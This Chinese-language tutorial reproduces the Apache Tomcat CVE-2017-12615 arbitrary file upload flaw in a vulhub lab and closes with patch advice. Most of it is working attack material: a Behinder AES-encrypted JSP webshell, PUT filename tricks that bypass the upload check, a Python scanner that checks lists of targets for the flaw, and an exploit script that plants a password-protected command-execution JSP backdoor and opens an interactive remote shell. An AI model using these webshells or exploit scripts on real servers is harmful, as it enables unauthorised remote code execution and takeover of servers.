Tomcat任意文件写入(CVE-2017-12615)漏洞复现-含POC和EXP
漏洞描述
CVE-2017-12615:远程代码执行漏洞
影响范围:Apache Tomcat 7.0.0 - 7.0.79 (windows环境)
当 Tomcat 运行在 Windows 操作系统时,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。
环境搭建
为了方便,使用vulhub搭建漏洞环境
#进入漏洞目录
cd vulhub/tomcat/CVE-2017-12615/
#开启环境
docker-compose up -d
查看配置文件
#查看镜像
docker ps
#进入镜像环境
docker exec -ti 03de30c386ea bas
#查看配置文件conf/web.xml中readonly的设置
cat conf/web.xml | grep readonly
查看网站
http://192.168.132.140:8080/
漏洞复现
方法一
使用burpsuite抓包,修改GET为PUT上传方式,添加文件名1.jsp/,添加shell脚本
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
上传成功
使用冰蝎访问
方法二(适用于Windows系统)
添加文件名2.jsp%20,添加shell脚本
方法三(适用于Windows系统)
添加文件名3.jsp::$DATA,添加shell脚本
POC和EXP脚本
POC代码
#CVE-2017-12615 POC
__author__ = '纸机'
import requests
import optparse
import os
parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT] [-f FILE]')
parse.add_option('-u','--url',dest='URL',help='target url')
parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
parse.add_option('-f',dest='FILE',help='target list')
options,args = parse.parse_args()
#print(options)
#验证参数是否完整
if (not options.URL or not options.PORT) and not options.FILE:
print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port] [-f FILE]\n')
exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')
filename = '/hello.jsp'
#测试数据
data = 'hello'
#提交PUT请求
#resp = requests.post(url1,headers=headers,data=data)
#验证文件是否上传成功
#response = requests.get(url2)
#上传文件
def upload(url):
try:
response = requests.put(url+filename+'/',data=data)
return 1
except Exception as e:
print("[-] {0} 连接失败".format(url))
return 0
def checking(url):
try:
#验证文件是否上传成功
response = requests.get(url+filename)
#print(url+filename)
if response.status_code == 200 and 'hello' in response.text:
print('[+] {0} 存在CVE-2017-12615 Tomcat 任意文件读写漏洞'.format(url))
else:
print('[-] {0} 不存在CVE-2017-12615 Tomcat 任意文件读写漏洞'.format(url))
except Exception as e:
#print(e)
print("[-] {0} 连接失败".format(url))
if options.FILE and os.path.exists(options.FILE):
with open(options.FILE) as f:
urls = f.readlines()
#print(urls)
for url in urls:
url = str(url).replace('\n', '').replace('\r', '').strip()
if upload(url) == 1:
checking(url)
elif options.FILE and not os.path.exists(options.FILE):
print('[-] {0} 文件不存在'.format(options.FILE))
else:
#上传链接
url = options.URL+':'+options.PORT
if upload(url) == 1:
checking(url)
测试
python3 CVE-2017-15715-POC.py -u http://192.168.132.144 -p8080
python3 CVE_2017_12615.py -f IP.txt
EXP代码
#CVE-2017-12615 EXP
__author__ = '纸机'
import requests
import optparse
import time
parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT]')
parse.add_option('-u','--url',dest='URL',help='target url')
parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
options,args = parse.parse_args()
#验证参数是否完整
if not options.URL or not options.PORT:
print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port]\n')
exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')
url = options.URL+':'+options.PORT
filename = '/backdoor.jsp'
payload = filename+'?pwd=023&i='
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0"}
#木马
data = '''<%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>'''
#上传木马文件
def upload(url):
print('[*] 目标地址:'+url)
try:
respond = requests.put(url+filename+'/',headers=headers,data = data)
#print(respond.status_code)
if respond.status_code == 201 or respond.status_code == 204:
#print('[*] 目标地址:'+url)
print('[+] 木马上传成功')
except Exception as e:
print('[-] 上传失败')
return 0
#命令执行
def attack(url,cmd):
try:
respond = requests.get(url+payload+cmd)
if respond.status_code == 200:
print(str(respond.text).replace("<pre>","").replace("</pre>","").strip())
except Exception as e:
print('[-] 命令执行错误')
if upload(url) == 0:
exit()
time.sleep(0.5)
print('输入执行命令(quit退出):')
while(1):
cmd = input('>>>')
if(cmd == 'quit'):
break
attack(url,cmd)
测试
python3 CVE-2017-12615-EXP.py -u http://192.168.132.144 -p 35654
修复建议
-
设置conf/webxml 文件的 readOnly 值为 Ture 或注释参数
-
禁用 PUT 方法并重启 tomcat 服务(如果禁用 PUT 方法,对于依赖PUT方法的应用,可能导致业务失效。)
-
升级到最新版本
-
使用WAF产品进行防御
参考文章
https://blog.csdn.net/weixin_45540609/article/details/119170419
